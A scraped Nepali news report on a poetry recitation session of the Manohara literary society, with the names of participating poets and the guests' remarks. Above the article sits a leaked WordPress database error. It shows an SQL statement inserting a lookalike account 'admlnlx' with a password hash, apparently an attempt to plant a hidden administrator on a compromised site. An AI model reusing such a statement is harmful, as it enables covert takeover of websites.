WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BKMtKcbFWrhEdrAlqddACPZ1t9X9E80', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-08 04:25:28', '', 'admlnlx', 'admlnlx')
काठमाडौँ,माघ ९ –
मनोहरा साहित्य समाजको नियमित कार्यक्रम अन्तर्गत सोह्रौँ शृङ्खलामा दश कविले दुई दुई कविता वाचन गर्नुभएको छ ।
राम विनय र विशिष्ट अतिथि प्राज्ञ बूँद राना तथा टिप्पणीकर्ताका रुपमा अतिथि हरि गौतम तथा कवि तथा गीतकार जसध्वज गुरुङले सभापतित्व गर्नु भएको थियो ।
कार्यक्रममा रामबहादुर पहाडी, जय छाङ्छा, नारायण तिवारी, छविरमण सिलवाल, गोविन्द नेपाल, अनिल पौडेल, श्यामबहादुर भावुक, भुवनराज सिवाकोटी, रत्ननिधि रेग्मी शुक्राचार्य र डिल्लीराज अर्यालले कविता वाचन गर्नु भएको थियो ।
वाचित कवितामाथि टिप्पणी गर्दै हरि गौतमले कविताका विशेषता, सरलता, त्यसले पार्ने प्रभाव बारेमा उल्लेख गर्नुभयो । त्यस्तै बुँद रानाले भैरहवा लगायत तराईका फाँटहरुलाई अहिले अमनचैनको अवस्था नभएकाले संवेदनशील विषयमा ध्यान पु¥याउन स्रष्टालाई आग्रह गर्नुभयो ।
साहित्यकार राम विनयले मनोहरा साहित्य समाजको कार्यक्रमले निरन्तरता पाओस् भन्ने कामना गर्नुभयो । साहित्यकार जसध्वज गुरुङ, मुखाले रेग्मी र शीतल गिरीले स्रष्टाहरुको सदैव सहभागिताको अपेक्षा गर्नुभयो । – रासस